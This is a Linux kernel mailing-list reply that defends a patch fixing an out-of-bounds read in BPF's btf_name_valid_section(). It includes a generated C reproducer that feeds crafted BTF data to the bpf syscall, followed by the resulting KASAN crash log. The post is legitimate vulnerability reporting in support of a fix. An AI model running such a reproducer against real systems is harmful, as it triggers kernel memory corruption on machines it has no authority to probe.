[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-Id: <20240829034552.262214-1-aha310510@gmail.com>
Date: Thu, 29 Aug 2024 12:45:52 +0900
From: Jeongjun Park <aha310510@...il.com>
To: alexei.starovoitov@...il.com
Cc: aha310510@...il.com,
andrii@...nel.org,
ast@...nel.org,
bpf@...r.kernel.org,
daniel@...earbox.net,
eddyz87@...il.com,
haoluo@...gle.com,
john.fastabend@...il.com,
jolsa@...nel.org,
kpsingh@...nel.org,
linux-kernel@...r.kernel.org,
martin.lau@...ux.dev,
sdf@...ichev.me,
song@...nel.org,
yonghong.song@...ux.dev
Subject: Re: [PATCH bpf] bpf: add check for invalid name in btf_name_valid_section()
Alexei Starovoitov wrote:
>
> On Fri, Aug 23, 2024 at 3:43 AM Jeongjun Park <aha310510@...il.com> wrote:
> >
> > If the length of the name string is 1 and the value of name[0] is NULL
> > byte, an OOB vulnerability occurs in btf_name_valid_section() and the
> > return value is true, so the invalid name passes the check.
> >
> > To solve this, you need to check if the first position is NULL byte.
> >
> > Fixes: bd70a8fb7ca4 ("bpf: Allow all printable characters in BTF DATASEC names")
> > Signed-off-by: Jeongjun Park <aha310510@...il.com>
> > ---
> > kernel/bpf/btf.c | 3 +++
> > 1 file changed, 3 insertions(+)
> >
> > diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
> > index 520f49f422fe..5c24ea1a65a4 100644
> > --- a/kernel/bpf/btf.c
> > +++ b/kernel/bpf/btf.c
> > @@ -823,6 +823,9 @@ static bool btf_name_valid_section(const struct btf *btf, u32 offset)
> > const char *src = btf_str_by_offset(btf, offset);
> > const char *src_limit;
> >
> > + if (!*src)
> > + return false;
> > +
>
> We've talked about it. Quote:
> "Pls add a selftest that demonstrates the issue
> and produce a patch to fix just that."
>
> length == 1 and name[0] = 0 is a hypothesis.
> Demonstrate that such a scenario is possible then this patch will be
> worth applying.
>
> pw-bot: cr
Sorry for the omission, I still don't know how to write selftest.
But I can give you the C repro and KASAN log that trigger this vulnerability.
I would appreciate it if you could look at it and make a judgment.
Regards,
Jeongjun Park
C repro:
// gcc -o repro repro.c
#define _GNU_SOURCE
#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_bpf
#define __NR_bpf 321
#endif
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
const char* reason;
(void)reason;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {}
*(uint64_t*)0x20000340 = 0x20000140;
*(uint16_t*)0x20000140 = 0xeb9f;
*(uint8_t*)0x20000142 = 1;
*(uint8_t*)0x20000143 = 0;
*(uint32_t*)0x20000144 = 0x18;
*(uint32_t*)0x20000148 = 0;
*(uint32_t*)0x2000014c = 0xc4;
*(uint32_t*)0x20000150 = 0xc4;
*(uint32_t*)0x20000154 = 5;
*(uint32_t*)0x20000158 = 4;
*(uint16_t*)0x2000015c = 0xa;
*(uint8_t*)0x2000015e = 0;
*(uint8_t*)0x2000015f = 0xf;
*(uint32_t*)0x20000160 = 1;
*(uint32_t*)0x20000164 = 3;
*(uint32_t*)0x20000168 = 1;
*(uint32_t*)0x2000016c = 0x9247;
*(uint32_t*)0x20000170 = 3;
*(uint32_t*)0x20000174 = 0xfffffff9;
*(uint32_t*)0x20000178 = 9;
*(uint32_t*)0x2000017c = 5;
*(uint32_t*)0x20000180 = 0x7d;
*(uint32_t*)0x20000184 = 0x48;
*(uint32_t*)0x20000188 = 3;
*(uint32_t*)0x2000018c = 9;
*(uint32_t*)0x20000190 = 2;
*(uint32_t*)0x20000194 = 1;
*(uint32_t*)0x20000198 = 0xe;
*(uint32_t*)0x2000019c = 5;
*(uint32_t*)0x200001a0 = 3;
*(uint32_t*)0x200001a4 = 0xfffffa64;
*(uint32_t*)0x200001a8 = 0xffff;
*(uint32_t*)0x200001ac = 3;
*(uint32_t*)0x200001b0 = 3;
*(uint32_t*)0x200001b4 = 0xfff;
*(uint32_t*)0x200001b8 = 5;
*(uint32_t*)0x200001bc = 0x8fd;
*(uint32_t*)0x200001c0 = 0xa16;
*(uint32_t*)0x200001c4 = 2;
*(uint32_t*)0x200001c8 = 7;
*(uint32_t*)0x200001cc = 6;
*(uint32_t*)0x200001d0 = 2;
*(uint32_t*)0x200001d4 = 0xe821;
*(uint32_t*)0x200001d8 = 5;
memset((void*)0x200001dc, 104, 1);
*(uint32_t*)0x200001dd = 0xf;
*(uint16_t*)0x200001e1 = 0;
*(uint8_t*)0x200001e3 = 0;
*(uint8_t*)0x200001e4 = 8;
*(uint32_t*)0x200001e5 = 4;
*(uint32_t*)0x200001e9 = 0;
*(uint16_t*)0x200001ed = 0;
*(uint8_t*)0x200001ef = 0;
*(uint8_t*)0x200001f0 = 3;
*(uint32_t*)0x200001f1 = 0;
*(uint32_t*)0x200001f5 = 4;
*(uint32_t*)0x200001f9 = 3;
*(uint32_t*)0x200001fd = 2;
*(uint32_t*)0x20000201 = 7;
*(uint16_t*)0x20000205 = 0;
*(uint8_t*)0x20000207 = 0;
*(uint8_t*)0x20000208 = 0xa;
*(uint32_t*)0x20000209 = 5;
*(uint32_t*)0x2000020d = 3;
*(uint16_t*)0x20000211 = 0;
*(uint8_t*)0x20000213 = 0;
*(uint8_t*)0x20000214 = 0xf;
*(uint32_t*)0x20000215 = 3;
memcpy((void*)0x20000219, "\x65\xd8\x38", 3);
*(uint8_t*)0x2000021c = 0;
*(uint8_t*)0x2000021d = 0;
*(uint8_t*)0x2000021e = 0;
*(uint8_t*)0x2000021f = 0;
*(uint8_t*)0x20000220 = 0;
*(uint64_t*)0x20000348 = 0;
*(uint32_t*)0x20000350 = 0xe1;
*(uint32_t*)0x20000354 = 0;
*(uint32_t*)0x20000358 = 0;
*(uint32_t*)0x2000035c = 0;
syscall(__NR_bpf, /*cmd=*/0x12ul, /*arg=*/0x20000340ul, /*size=*/0x20ul);
return 0;
}
KASAN log:
==================================================================
BUG: KASAN: slab-out-of-bounds in btf_name_valid_section kernel/bpf/btf.c:829 [inline]
BUG: KASAN: slab-out-of-bounds in btf_datasec_check_meta+0x7f8/0x880 kernel/bpf/btf.c:4698
Read of size 1 at addr ffff888012faaeb8 by task syz.3.2008/25618
CPU: 0 UID: 0 PID: 25618 Comm: syz.3.2008 Not tainted 6.11.0-rc5 #12
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:93 [inline]
dump_stack_lvl+0x116/0x1b0 lib/dump_stack.c:119
print_address_description mm/kasan/report.c:377 [inline]
print_report+0xc0/0x5e0 mm/kasan/report.c:488
kasan_report+0xbd/0xf0 mm/kasan/report.c:601
btf_name_valid_section kernel/bpf/btf.c:829 [inline]
btf_datasec_check_meta+0x7f8/0x880 kernel/bpf/btf.c:4698
btf_check_meta kernel/bpf/btf.c:5180 [inline]
btf_check_all_metas kernel/bpf/btf.c:5204 [inline]
btf_parse_type_sec kernel/bpf/btf.c:5340 [inline]
btf_parse kernel/bpf/btf.c:5732 [inline]
btf_new_fd+0x1764/0x4c30 kernel/bpf/btf.c:7650
bpf_btf_load kernel/bpf/syscall.c:5035 [inline]
__sys_bpf+0x1dc4/0x5040 kernel/bpf/syscall.c:5755
__do_sys_bpf kernel/bpf/syscall.c:5817 [inline]
__se_sys_bpf kernel/bpf/syscall.c:5815 [inline]
__x64_sys_bpf+0x78/0xc0 kernel/bpf/syscall.c:5815
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcb/0x250 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f6dee39712d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f6def181fa8 EFLAGS: 00000246 ORIG_RAX: 0000000000000141
RAX: ffffffffffffffda RBX: 00007f6dee535f80 RCX: 00007f6dee39712d
RDX: 0000000000000020 RSI: 0000000020000600 RDI: 0000000000000012
RBP: 00007f6dee41bd8a R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 000000000000000b R14: 00007f6dee535f80 R15: 00007f6def162000
</TASK>
Allocated by task 25618:
kasan_save_stack+0x24/0x50 mm/kasan/common.c:47
kasan_save_track+0x14/0x30 mm/kasan/common.c:68
poison_kmalloc_redzone mm/kasan/common.c:370 [inline]
__kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:387
kasan_kmalloc include/linux/kasan.h:211 [inline]
__do_kmalloc_node mm/slub.c:4158 [inline]
__kmalloc_node_noprof+0x20a/0x450 mm/slub.c:4164
__kvmalloc_node_noprof+0x148/0x1b0 mm/util.c:650
btf_parse kernel/bpf/btf.c:5708 [inline]
btf_new_fd+0x5f9/0x4c30 kernel/bpf/btf.c:7650
bpf_btf_load kernel/bpf/syscall.c:5035 [inline]
__sys_bpf+0x1dc4/0x5040 kernel/bpf/syscall.c:5755
__do_sys_bpf kernel/bpf/syscall.c:5817 [inline]
__se_sys_bpf kernel/bpf/syscall.c:5815 [inline]
__x64_sys_bpf+0x78/0xc0 kernel/bpf/syscall.c:5815
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcb/0x250 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
The buggy address belongs to the object at ffff888012faae00
which belongs to the cache kmalloc-192 of size 192
The buggy address is located 0 bytes to the right of
allocated 184-byte region [ffff888012faae00, ffff888012faaeb8)
The buggy address belongs to the physical page:
page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x12faa
flags: 0xfff00000000000(node=0|zone=1|lastcpupid=0x7ff)
page_type: 0xfdffffff(slab)
raw: 00fff00000000000 ffff8880154413c0 ffffea00004b78c0 dead000000000002
raw: 0000000000000000 0000000080100010 00000001fdffffff 0000000000000000
page dumped because: kasan: bad access detected
page_owner tracks the page as allocated
page last allocated via order 0, migratetype Unmovable, gfp_mask 0x52cc0(GFP_KERNEL|__GFP_NOWARN|__GFP_NORETRY|__GFP_COMP), pid 8387, tgid 8387 (syz-executor), ts 57078807121, free_ts 54812229064
set_page_owner include/linux/page_owner.h:32 [inline]
post_alloc_hook+0x2e7/0x350 mm/page_alloc.c:1493
prep_new_page mm/page_alloc.c:1501 [inline]
get_page_from_freelist+0xbf3/0x2850 mm/page_alloc.c:3439
__alloc_pages_noprof+0x214/0x21e0 mm/page_alloc.c:4695
__alloc_pages_node_noprof include/linux/gfp.h:269 [inline]
alloc_pages_node_noprof include/linux/gfp.h:296 [inline]
alloc_slab_page+0x55/0x100 mm/slub.c:2321
allocate_slab mm/slub.c:2484 [inline]
new_slab+0x83/0x260 mm/slub.c:2537
___slab_alloc+0xbb7/0x1850 mm/slub.c:3723
__slab_alloc.constprop.0+0x56/0xb0 mm/slub.c:3813
__slab_alloc_node mm/slub.c:3866 [inline]
slab_alloc_node mm/slub.c:4025 [inline]
__kmalloc_cache_noprof+0x2be/0x310 mm/slub.c:4184
kmalloc_noprof include/linux/slab.h:681 [inline]
kzalloc_noprof include/linux/slab.h:807 [inline]
kset_create lib/kobject.c:965 [inline]
kset_create_and_add+0x4f/0x1a0 lib/kobject.c:1008
register_queue_kobjects net/core/net-sysfs.c:1887 [inline]
netdev_register_kobject+0x1d2/0x400 net/core/net-sysfs.c:2140
register_netdevice+0x1329/0x1bf0 net/core/dev.c:10444
veth_newlink+0x4bd/0x960 drivers/net/veth.c:1860
rtnl_newlink_create net/core/rtnetlink.c:3510 [inline]
__rtnl_newlink+0x1138/0x18e0 net/core/rtnetlink.c:3730
rtnl_newlink+0x68/0xa0 net/core/rtnetlink.c:3743
rtnetlink_rcv_msg+0x3c9/0xfb0 net/core/rtnetlink.c:6647
netlink_rcv_skb+0x165/0x440 net/netlink/af_netlink.c:2550
page last free pid 96 tgid 96 stack trace:
reset_page_owner include/linux/page_owner.h:25 [inline]
free_pages_prepare mm/page_alloc.c:1094 [inline]
free_unref_folios+0x9c6/0x1320 mm/page_alloc.c:2660
shrink_folio_list+0x29f0/0x4260 mm/vmscan.c:1530
evict_folios+0x71e/0x1b50 mm/vmscan.c:4580
try_to_shrink_lruvec+0x62b/0x9a0 mm/vmscan.c:4775
shrink_one+0x417/0x7c0 mm/vmscan.c:4813
shrink_many mm/vmscan.c:4876 [inline]
lru_gen_shrink_node mm/vmscan.c:4954 [inline]
shrink_node+0x244d/0x3830 mm/vmscan.c:5934
kswapd_shrink_node mm/vmscan.c:6762 [inline]
balance_pgdat+0xba2/0x1880 mm/vmscan.c:6954
kswapd+0x702/0xd50 mm/vmscan.c:7223
kthread+0x2c7/0x3b0 kernel/kthread.c:389
ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147
ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244
Memory state around the buggy address:
ffff888012faad80: 00 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
ffff888012faae00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>ffff888012faae80: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc
^
ffff888012faaf00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ffff888012faaf80: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc
==================================================================
Powered by blists - more mailing lists